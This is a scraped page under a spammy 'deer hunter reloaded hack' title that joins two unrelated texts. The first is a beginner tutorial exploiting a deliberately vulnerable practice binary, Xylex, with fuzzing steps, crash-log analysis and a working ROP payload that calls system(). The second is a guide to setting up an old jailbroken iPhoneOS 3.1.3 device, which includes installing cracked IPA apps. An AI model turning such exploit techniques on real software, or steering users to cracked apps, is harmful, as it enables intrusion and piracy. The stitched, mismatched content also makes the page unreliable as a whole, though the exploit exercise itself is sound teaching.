Download deer hunter reloaded hack ifunbox classic

Hi Jailbreak! GeoSn0w here!
Spoiler alert! Long tutorial, suitable for beginners!
A couple days ago I've decided to try to complete the Xylex challenge created by developer Billy Ellis. Some of you know Billy already, but for those who don't I'll have some links down below.
Basically, Xylex is an application that is made purposefully vulnerable by Billy as part of his Exploit-challenges project on GitHub. As I liked the idea of trying some ROP, I've decided to complete the challenge and while I am at it, maybe to also write a tutorial. Keep in mind, this is going to be a long tutorial, so reload your patience cartridges and let's do it. Also, do keep in mind that Billy made a very good video on it too, will have a link down below if you're a visual learner.
Enough Introduction, let's sploit
Okay, so we know that Xylex is an armv7 Mach-O binary, this means we can't play with it in macOS terminal, we have to side-load it to a Jailbroken device. I think any device would do. I have tried on aarch64 as well and it works.
You can download the armv7 compiled Xylex from Billy's Github. I've used iFunBox to load it into DCIM and from there I've moved it with Filza to a Development folder somewhere in /va
Okay so when we run the application for the first time, via SSH, of course, as we want to exploit it remotely from the PC, we can see an ASCII welcome screen.
As you can see from the screenshot, the application asks for authentication (username only), so I thought I should try feeding the app a couple "AAAAA" to see if we can trigger a crash and therefore a buffer overflow, but the application is apparently well made and it is not vulnerable on that part as can be seen from the next screenshot. The application responds with the fact that there is no user with that name and quits normally.
Okay, so we need another approach. Time to fire up Hopper (Or IDA... Or Radare...).
Okay, so we've loaded the Mach-O into Hopper Disassembler, and we've located the _main function. In this screenshot of Hopper you can see that we've located the ASCII welcome message and looking a bit further down we can easily spot the username being hardcoded into the app and that being guest as can be seen from here.
Let's test the username we've found hardcoded in the app. Yep, it does indeed work and sends us to a new screen.
Okay, but how can we exploit this application so that we can change its control flow in a way that it would facilitate us to do things that were not intended to be done? Well, since the username part seem to not be vulnerable, let's try further with something else. You can see that after we've managed to log in, the app gives 3 possible operations:

• Display system version, which in fact displays Xylex version, not very useful for what we need as it does not accept any kind of user inputs.
• Open file (now we're talking!)
• Exit (clearly not useful for us)

Okay, so we have a feature that allows us to open files inside Xylex, well, let's try the same fuzzing method, only inside a file. In order to craft our file we can use the following command in terminal:

printf "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" > testdummy 

That would create a a new file called testdummy in the current directory containing a bunch of "A". Let's see what effect it has on Xylex once we load it on.
Sweeeeet! As you can see the application has returned "Segmentation Failed: 11" which means it has crashed, so it is definitely vulnerable! We've got the vulnerability, now how we can exploit it? Well, let's first find the cause of the crash. To do that, we're going to analyze the crashlog.
The crashlogs can be found on the following path /vamobile/Library/Logs/CrashReporte and as you can see, with ls command we can see all the crash logs, including Xylex. We're going to select the most recent. The date is in the name of the log as can be seen here
Let's cat the last log. As you can see, we've managed to overwrite the PC (Program counter) register with 0x41414140 which is the hex for "AAAAA". So we basically got control over the program's flow, but where? The PC holds the address to which the program flow will be redirected next, so if we can possibly put our own address there, we can execute whatever we want, but what we want to execute? Let's go ahead back to Hopper and see if we can find anything useful, but before we do that, we must see WHERE in that huge chunk of "A"s is the PC being overwritten? We need to know that either way, there's nothing much we can do with this vuln. To do that, let's change our testdummy file from "AAAAA" to a pattern like "AAAAABBBBBCCCCCDDDDD" so that we can detect in which group the PC gets overwritten. So the command would look like:

printf "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHKKKKLLLLMMMM" > testdummy 

Alright, so we've managed to produce another "Segmentation Fault:11" with the new file, now let's analyze the crash log an see which pair caused the overwrite on PC.
As you can see from the crashlog, PC is now 0x46464646, which happens to be "F" in hex, so we know that the PC register got overwritten after E. There is where we are going to place our good stuff, but what is this good stuff? Time for Hooper.
As you can see, in Hopper we can easily see the system() function being referenced, and Billy was kind enough to leave an "uname -a" in the program at address 0xc040 ;) So theoretically we can pwn the program so that once our shellcode is loaded via the file opening function, we redirect the program to a specific address and possibly execute uname -a which will give us details about the iDevice (the Kernel version and so on). This was never intended to be possible, so how the hell we can do that?
Billy has left an Easter egg for us in the program, apparently. See, there is a _gadget method at 0xbb74 that literally contains

 pop {r0, pc} 

A better ROP gadget wouldn't be possible for this program. If we can overwrite the PC (program counter) and the r0 (general purpose register) to contain the good stuff we need, we will be able to run our command and hijack the program!
Okay, so we have all we need, now we need to craft our shellcode.
We're going to use the chars from A to E as and then we're going to place the good stuff. Let's collect addresses ;)
We know that "uname -a" is located at address 0xc040 and if you look closely, at 0xbb98, we have a branch with link (bl) instruction that looks like this:

0000bb98 bl imp___symbolstub1__system 

Here we go with our system() call!
Okay, so we have the gadget and the good stuff, we know where PC register gets overwritten, let's craft our shellcode:
So we have the following important addresses collected:

• 0xbb74 - The _gadget we're going to use!
• 0xbb98 - The system() call!
• 0xc040 - The "uname -a" command!

At first we will copy the A -> E from the dummy file:

AAAABBBBCCCCDDDDEEEE 

And now we add the addresses we've collected. Now, because the byte sex is Little Endian, we have to put it backwards! like this:

AAAABBBBCCCCDDDDEEEE\x74\xbb\x00\x00\x40\xc0\x00\x00\x98\xbb\x00\x00 

So we have the addresses written in Little Endian, and we have the gadget, the uname command and finally the system() call.
Let's write this into a new exploit file!
Okay, now let's feed the exploit file to the program and see what happens! AND HERE IS THE RESULT! As you can see, we've pwned the program! It did run "uname -a", printed out the output of the command which is represented by details about the kernel, and the Seg. Faulted and quit :)
That's it! We've pwned the program, controlled the flow of it, ran an arbitrary command and got to where we wanted!
Thanks a lot of reading, I really hope you've enjoyed this tutorial, took a while to put together, and I wanna thank Billy Ellis for the amazing Xylex program he has created. Billy has also made a video with the exploitation (exactly what we did) of Xylex.
Other Resources

• A video tutorial on this by Billy Ellis
• Follow Billy on Twitter
• You can also check my iOS Channel if you want
• Or follow me on twitter if you wish

I hope this tutorial helps! Note that I am a beginner on iOS Exploitation myself, so I am teaching you as I learn. I hope I made things clear.
~GeoSn0w

Prelude

So you've just jailbroken with Redsn0w. What do you do now?
I'm gonna explain how to fix your non-functioning Cydia, install Debian packages, install IPA files (APKs for iOS) to your device, and finally, fix certificate issues with Safari.
Since this is going to be quite an extensive guide, I will split this guide into 4 sections. Note that all folder names introduced in this tutorial are case sensitive.
Download iFunBox Classic if you're on Windows, download iFunBox if you're on Mac (iFunBox download)

Fix Cydia

1. After you freshly jailbroke, open Cydia for the first time and select User, let Cydia do its thing and open it again after it's done. If it opens and reloads data by itself, skip step 2, but if it gets stuck on loading data for more than 10 minutes, follow step 2.
2. If your Cydia now gets stuck on reloading data for more than 10 minutes, connect your device to your Windows computer or Mac computer with the software iFunBox installed and close Cydia. Then, go to Device>private>var>lib>apt>lists and delete everything except for the Partial folder. Open Cydia again and select User.
3. Go to sources and add the InvoxiPlayGames repo [click edit, then click add source, and type exactly cydia.invoxiplaygames.uk, and click add source again], and let install the repo.
4. Go to the Search tab and search for CydiaHTTPatch. Click the first result and click install, and once prompted, restart Springboard. Your Cydia should be fixed. If it still has this error, you will need to manually install Debian Packages

Install Debian Packages

^{Note that this method is only for when your Cydia doesn't get fixed by the previous method.}
Use iFunBox to do this

1. Search and download your tweak from www.cydiacrawler.com. It should be in the form of a .deb file.
2. Navigate to Device→var→root→Media, and create a folder named Cydia. If it's already there, open it.
3. Inside the folder Cydia, create a folder named AutoInstall. Again, if it's already there, open it.
4. Place your .deb tweak inside the AutoInstall folder and reboot, not respring.
5. Every time you want to install a tweak now, just put the .deb file into the AutoInstall folder, and reboot.

Install IPA Files

Many of you know that the App Store is extremely slow and most apps that are compatible are now removed from the app store. To get apps to work, you need to install something called an IPA file, which is APKs for iOS devices. To get the IPA files, I highly recommend the Momentum Store, which hosts a large collection of IPA files. To download the files, you will have to sign up for an account. (You will see me active on there a lot, posting my stash of iPhoneOS 3.1.3 IPAs)

1. Get the tweak Appsync (for those of you who have working Cydia, add the repo mtmdev.org/repo, and search Appsync for iOS 3 on Cydia, click the top result and install it; for those who don't, install this .deb manually.)
2. Now, for those with working Cydia, after it resprings your device, connect your device to your computer with iFunBox open; if you don't have a working Cydia, you should already be connected to your computer.
3. Select Install App at the top, and drag your .ipa file in.
4. Wait for the installation progress bar to finish, this may take 30 seconds - 3 minutes depending on your USB transfer speed and the size of the app. If the installation fails, the app is not compatible with your iPhoneOS version. If the app crashes at launch, the cracker has not cracked the app properly, it's not your fault :)

Fix Safari Issues

1. From my Google Drive, retrieve the IPA for Opera Mini.
2. Install the IPA file, as I explained on the previous section
3. Open up Opera Mini, and you're good to go!

With Opera Mini, you can visit almost any modern website without getting errors, such as Reddit (but you have to use i.reddit.com or old.reddit.com). You can even log in, comment, and post! Additionally, Gmail works as well, you can sign into Google, all that good stuff. However, the search bar from www.google.com does not work; use the search bar at the top right.
As of now, you can only watch very old Youtube videos on Opera Mini. If you get an error message saying "opera mini is soon becoming opera touch" or "opera mini is not supported", just click the X at the top right and it should go away. AFAIK even after its not supported it will continue to work.

Footnote

I hope this guide helped you improve your experience with your iPhones and iPod Touches running iPhoneOS 3.1.3. As of now, there isn't a way to fix the weather app, as the API is too old, however, everything else works :)
Some Tweaks I Recommend You Get:

1. Appsync Unified
2. MobileTerminal (Obsolete)*
3. Flashlight by BigBoss
4. SBSettings
5. Cycorder (for iPhone only)
6. A2DP Enabler
7. SetWallpaper

*Only the (Obsolete) version works on iPhoneOS 3.1.3.
For further information and downloads, click here. Note that you do need an account to download; sign up and contact u/Anbar48. Do not attempt to install the tweak IPAInstaller, it is meant for iOS 5+.
If you want another section added or further explanation of a section, feel free to leave it in the comments. I'm pretty sure this guide applies for iPhoneOS 2 and iOS 4 as well, but don't try to install the IPA for Opera Mini on iPhoneOS 2 because that's for iPhoneOS 3.1.x and above.